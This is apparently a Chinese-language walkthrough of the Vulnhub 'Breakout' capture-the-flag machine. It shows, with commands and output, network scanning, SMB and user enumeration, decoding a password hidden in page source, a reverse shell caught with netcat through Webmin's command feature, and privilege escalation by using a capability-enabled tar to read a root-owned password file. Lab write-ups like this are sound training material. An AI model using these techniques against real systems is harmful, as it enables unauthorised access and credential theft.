02 Breakout
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/02_breakout]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.74.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:88:e9:8b 1 60 PCS Systemtechnik GmbH
192.168.56.176 08:00:27:28:88:4b 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.176
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/02_breakout]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.176 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-14 06:41 EST
Nmap scan report for bogon (192.168.56.176)
Host is up (0.00038s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.51 (Debian)
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10000/tcp open http MiniServ 1.981 (Webmin httpd)
|_http-title: 200 — Document follows
20000/tcp open http MiniServ 1.830 (Webmin httpd)
|_http-title: 200 — Document follows
MAC Address: 08:00:27:28:88:4B (Oracle VirtualBox virtual NIC)
Host script results:
|_clock-skew: 7h59m59s
| smb2-time:
| date: 2022-11-14T19:41:16
|_ start_date: N/A
|_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.60 seconds
Get Access
从SMB服务开始分析:
┌──(kali㉿kali)-[~/Vulnhub/02_breakout]
└─$ smbclient -L 192.168.56.176
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.13.5-Debian)
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/Vulnhub/02_breakout]
└─$ smbclient //192.168.56.176/IPC$
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
smb: \> quit
SMB服务没有暴露可利用的攻击面。
访问80端口,返回默认页面,但是在页面源代码中有以下信息:
<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
-->
这是一串编码过的信息,用网站Brainfuck/OoK加密解密 - Bugku CTF解密得到:
.2uqPEfj3D<P'a-3
10000端口和20000端口分别是webmin和userbin
┌──(kali㉿kali)-[~/Vulnhub/02_breakout]
└─$ enum4linux 192.168.56.176
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Nov 14 06:51:44 2022
=========================================( Target Information )=========================================
Target ........... 192.168.56.176
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 192.168.56.176 )===========================
[+] Got domain/workgroup name: WORKGROUP
=================( Users on 192.168.56.176 via RID cycling (RIDS: 500-550,1000-1050) )=================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\cyber (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
发现了用户名cyber
用该用户名和前面得到的密码尝试登录10000和20000端口,发现只能登录20000端口
发现页面左下角有执行命令的功能
接下来设法得到反弹shell
┌──(kali㉿kali)-[~/Vulnhub/02_breakout]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.176] 57644
bash: cannot set terminal process group (1336): Inappropriate ioctl for device
bash: no job control in this shell
cyber@breakout:~$ id
id
uid=1000(cyber) gid=1000(cyber) groups=1000(cyber),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
cyber@breakout:~$ bash -i
bash -i
bash: cannot set terminal process group (1336): Inappropriate ioctl for device
bash: no job control in this shell
cyber@breakout:~$
提权
将linpeas.sh脚本上传至靶机,没有发现有SUID的程序
cyber@breakout:~$ getcap tar
getcap tar
tar cap_dac_read_search=ep
cyber@breakout:~$
用户目录下的这个tar命令可以读取敏感文件
查找有pass名称的文件
find / -name '*pass*' 2>/dev/null
/var/backups/.old_pass.bak
/var/lib/dpkg/info/base-passwd.list
/var/lib/dpkg/info/base-passwd.postinst
/var/lib/dpkg/info/base-passwd.md5sums
/var/lib/dpkg/info/passwd.list
/var/lib/dpkg/info/base-passwd.templates
/var/lib/dpkg/info/base-passwd.preinst
/var/lib/dpkg/info/passwd.conffiles
/var/lib/dpkg/info/passwd.md5sums
/var/lib/dpkg/info/passwd.preinst
/var/lib/dpkg/info/passwd.postrm
/var/lib/dpkg/info/passwd.postinst
/var/lib/dpkg/info/base-passwd.postrm
/var/lib/dpkg/info/passwd.prerm
/var/lib/pam/password
/var/lib/samba/private/passdb.tdb
/var/cache/debconf/passwords.dat
/boot/grub/i386-pc/password.mod
/boot/grub/i386-pc/legacy_password_test.mod
/boot/grub/i386-pc/password_pbkdf2.mod
/run/systemd/ask-password
cyber@breakout:~$
ls -alh /var/backups/.old_pass.bak
-rw------- 1 root root 17 Oct 20 2021 /var/backups/.old_pass.bak
这个文件率属于root,看能否用tar命令读取出来
cyber@breakout:~$ ./tar -cf bak.tar /var/backups/.old_pass.bak
./tar -cf bak.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names
cyber@breakout:~$ ls
ls
bak.tar
tar
user.txt
cyber@breakout:~$ tar -xf bak.tar
tar -xf bak.tar
cyber@breakout:~$ ls
ls
bak.tar
tar
user.txt
var
cyber@breakout:~$ cd var
cd var
cyber@breakout:~/var$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 cyber cyber 4.0K Nov 14 15:14 .
drwxr-xr-x 9 cyber cyber 4.0K Nov 14 15:14 ..
drwxr-xr-x 2 cyber cyber 4.0K Nov 14 15:14 backups
cyber@breakout:~/var$ cd backups
cd backups
cyber@breakout:~/var/backups$ ls
ls
cyber@breakout:~/var/backups$ ls -alh
ls -alh
total 12K
drwxr-xr-x 2 cyber cyber 4.0K Nov 14 15:14 .
drwxr-xr-x 3 cyber cyber 4.0K Nov 14 15:14 ..
-rw------- 1 cyber cyber 17 Oct 20 2021 .old_pass.bak
cyber@breakout:~/var/backups$ cat .old_pass.bak
cat .old_pass.bak
Ts&4&YurgtRX(=~h
cyber@breakout:~/var/backups$
用这个密码切换到Root用户